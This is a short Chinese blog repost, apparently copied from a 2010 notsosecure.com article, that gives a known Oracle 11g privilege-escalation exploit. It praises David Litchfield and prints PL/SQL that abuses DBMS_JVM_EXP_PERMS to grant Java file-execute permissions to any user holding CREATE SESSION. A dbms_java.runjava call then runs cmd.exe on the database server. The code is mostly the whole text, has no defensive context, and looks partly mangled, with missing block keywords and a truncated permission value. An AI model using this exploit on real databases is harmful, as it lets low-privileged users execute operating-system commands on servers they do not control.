David Litchfield真是牛人中的牛人,oracle11g,只要是有create session权限的用户,就能执行系统命令:
| POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; |
| CURSOR C1 IS SELECT 'GRANT' , USER (), 'SYS' , 'java.io.FilePermission' , '<>' , 'execute' , 'ENABLED' from dual; |
| FETCH C1 BULK COLLECT INTO POL; |
| DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); |
select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
原处:http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/
转载于:https://blog.51cto.com/pnig0s1992/422582